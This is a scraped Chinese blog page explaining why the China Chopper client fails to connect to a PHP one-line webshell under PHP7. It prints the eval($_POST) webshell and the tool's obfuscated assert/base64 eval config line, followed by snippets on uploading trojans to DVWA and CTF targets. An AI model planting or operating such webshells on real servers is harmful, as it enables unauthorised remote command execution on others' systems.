菜刀连接PHP WebShell返回200错误

最新推荐文章于 2023-03-01 13:49:35 发布
原创 最新推荐文章于 2023-03-01 13:49:35 发布 · 2k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #安全漏洞 #网络安全

博客探讨了在使用菜刀连接PHP WebShell时遇到200错误的详细情况。错误源于PHP7版本中对某些函数动态调用的限制。解决方案是修改菜刀配置文件中的特定函数调用。

错误详情

WebShell内容:

<?php
    @eval($_POST['cmd']);
?>
  • 1
  • 2
  • 3

错误详情:

image-20200617163443345

在Hackber或BurpSuite中却没有问题:

image-20200617163510202

原因分析

PHP7版本过高,在PHP7中,动态调用一些函数是被禁止的,比如在array_map中调用assert会提示:Warning: Cannot call func_num_args() dynamically in %s on line %d

如果把一句话Shell中的@符号去掉,会提示:Cannot call assert() with string argument dynamically in ...shell.php(1) : eval()'d code on line 1

解决方案

在菜刀的配置文件中(caidao.conf)找到:array_map("ass"."ert",array("ev"."Al(\"\\\$xx%%3D\\\"Ba"."SE6"."4_dEc"."OdE\\\";@ev"."al(\\\$xx('%s'));\");"));

最低0.47元/天 解锁文章
CanMeng'Blog
关注
WebShell连接工具(中国菜刀、WeBaCoo、Weevely)使用
悦分享
07-31 4172
第三步此时会弹出一个添加shell的对话框,由图一看出我的“dxr.php”上传在站点根目录,所以这里的地址填为http//localhost/dxr.php。最后把这个文件保存,上传到你站点里面,可以是根目录,也可以是其他,都行的。这些网页脚本常称为WEB脚本木马,比较流行的asp或php木马,也有基于.NET的脚本木马与JSP脚本木马。最后点击“添加”按钮,成功后就会产生一条新的记录,鼠标右键点击就可以进行操作了,如下图,可以进行文件管理,数据库管理,虚拟终端。哈哈...大功告成!...
常见的webshell工具的流量特征
最新发布
m0_66458291的博客
01-19 4153
常见的webshell工具流量的简单分析(菜刀、蚁剑、冰蝎、哥斯拉)
DVWA Upload(菜刀连接文件上传出现: HTTP/1.1 200 OK问题)
qq_45780190的博客
05-10 3811
测试环境:虚拟机搭建DVWA,php7.3.4 连接工具:中国菜刀 安全级别:LOW 上传一句话木马 上传成功后用中国菜刀连接 发生以下问题 解决问题: pjp版本过高 将php版本降低为php5.0即可
[极客大挑战 2019]Upload(菜刀连接文件上传出现: HTTP/1.1 200 OK)
xlcvv的博客
04-06 6308
菜刀连接文件上传出现: HTTP/1.1 200 OK Server: openresty Date: Mon, 06 Apr 2020 08:42:03 GMT Content-Type: text/html Content-Length: 8 Connection: close X-Powered-By: PHP/5.5.9-1ubuntu4.29 的解决过程 关于文件上传的题目,之前一直有...
记一次菜刀报错
forinput的博客
03-01 296
记一次菜刀报错
解决中国菜刀连接失败问题
Suuannnn的博客
11-07 8838
今天上传了一个一句话木马,但是怎么也连接不上,抓了个包发现我的php里面的代码出现了特殊字符。 原来原因就出在了编码上,于是我回去检查了一下自己的编码,原来是一不小心用了utf16,把他换回utf8就OK了,心酸!!记录一下 ...
菜刀如何连接mysql_中国菜刀之终端操作及数据库管理
weixin_29798625的博客
02-10 3178
实验环境操作机:Windows XP目标地址:172.16.12.2实验目的认识中国菜刀工具熟练使用中国菜刀工具进行网站文件管理、数据库管理、使用虚拟终端等操作。实验内容内容预览尝试执行命令自定义终端路径配置数据库相关参数读取数据库信息和执行sql语句虚拟终端操作中国菜刀的虚拟终端功能其实是通过相应的脚本函数执行系统命令并取得返回信息。小i提示:在本次实验中,请注意实验工具、实验文件存放路径,不同...
解决DVWA(Low级别)中国菜刀连接失败问题(php版本问题)
myec_lipse的博客
04-22 2954
今天在DVWA平台上上传了个一句话木马,用中国菜刀连接了一下发现连接不上,百度了大半天,发现是php版本问题,之前在win7虚拟机上安装的XAMPP7的php版本是php7.x版本的,需要降低一下版本,度娘说降低到5.x版本就可以连接上了(因为啥咱也不知道咱也不敢问)。研究了半天感觉改来改去的太麻烦了就直接下了个XAMPP5,复制了一下XAMPP7的DVWA文件到XAMPP5上,在5的DVWA平台上上传了一个一句话木马,菜刀就能正常连接了,棒呆! ...
中国菜刀连接本地apache出现500错误的最快解决办法
weixin_43618066的博客
09-27 2830
中国菜刀连接本地apache出现500错误的最快解决办法 我几乎在百度,csdn查遍了所有方法,又复杂又不能成功。后来自己换了一下phpstudy的php版本,把php7换成5的版本就可以顺利解决了。 解决问题先用最简单的办法解决再尝试复杂的办法。但前提是你的代码,路径,网络是没问题的。 ...
中国菜刀php一句话,中国菜刀之写一句话木马变形
weixin_39879674的博客
04-01 1022
了解一句话脚本的工作原理一句话脚本的工作原理:一句话恶意脚本分析服务端与客户端。(此处以asp脚本语言简述原理)一句话恶意脚本服务端就是我们要用来插入到asp文件中的asp语句,(不仅仅是以asp为后缀的数据库文件),该语句将回为触发,接收入侵者通过客户端提交的数据,执行并完成相应的操作,服务端的代码内容为 其中pass可以自己修改一句话恶意脚本客户端(即为中国菜刀主程序)用来向服务端提交控制数据...
动态调用函数时的命令执行对于eval()和assert()的执行问题
Alexhirchi的博客
07-02 4026
前言 在做一道通过反序列化后动态调用函数的题目时,最后获取flag使用assert和phpinfo() 构成的命令可以执行 但eval和phpinfo()无法执行 ,本来以为只是因为assert可以把字符串参数当php代码执行,而eval是只能对合法的php代码可以执行的问题的原因,但这解释总感觉怪怪的,后来查询了一些文档并进行本地测试发现其另有原因。 附上题目中的主要代码: class HelloPhp { public $a; public $b; public func
Weevely(PHP菜刀)工具使用
血色苍穹
11-02 2998
前言 Weevely是一款使用python编写的webshell工具(集webshell生成和连接于一身),可以算作是linux下的一款菜刀替代工具(仅限于PHP),在linux上使用时还是很给力的,就是某些模块在Windows上无法使用,总的来说还是非常不错的一款工具。 仅用于安全学习教学之用,禁止非法用途 木马生成和命令格式 生成Weevely专用的木马 命令格式:weevely genera...
DVWA中国菜刀连接不上问题(低安全级别就连不上,看看这!!)
S__White的博客
10-30 6484
测试环境:虚拟机搭建DVWA,php7.3.4 连接工具:中国菜刀 安全级别:LOW 上传一句话木马过程省略 解决发生: 解决问题: 将php版本降低为php5.0即可 (小白一枚,解决第一个问题,记录一下,希望可以帮到很多人!!) ...
菜刀连接一句话木马出现:`Cannot call assert() with string argument dynamically`错误
逸鹏说道
08-25 219
前言 逆天还是上学那会玩渗透的,后来工作后就再也没碰了,所以用的工具还是以前经典款,这不,发现出问题了 问题 如果是PHP5则没有问题,如果是PHP7,会出现:Cannot call assert() with string argument dynamically的提示 解决 用谷歌搜了下,发现了这篇解释:https://www.freebuf.com/articles/web/197013...
php strtoup,PHP 7 的几处函数安全小变化
weixin_39997443的博客
03-09 328
To Begin With最近在准备 LANCTF,想把环境迁移到 PHP 7,却想到一些 payload 失效了。想着什么时候总结成一个笔记,恰巧在 FB 发现有人写了一篇博文,拜读后结合 CTF 环境整理了一下,总体来说,弃用了较多不安全的使用方式,但运行环境未过多限制时仍可使用。测试环境docker pull php:7.3.3-apachedocker pull php:7.0-apach...
菜刀工具连接不上_win7连接打印机提示错误0x00000002的解决教程
weixin_39733943的博客
11-18 535
今天小编给大家分享的是win7连接打印机提示错误0x00000002的解决教程,打印机是很多用户日常办公必备的工具,在很多地方,打印机都是以网络的形式进行连接的,当你使用打印机时,遇到无法连接错误0x00000002的问题时,可参照以下的方法进行解决。最近有win7系统用户使用打印机的时候,发现打印机出现了问题,导致无法打印,那么win7电脑无法连接打印机提示错误0x00000002如何解决呢?就...
PHP Webshell下载:深入研究精品资源
2. 数据库操作:连接数据库、执行SQL语句、导出或导入数据库。 3. 系统命令执行:在服务器上执行各种命令,如查看进程、修改配置等。 4. 安全检测:检查服务器的安全设置,尝试获取更多的权限。 5. 日志清除:在执行...
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值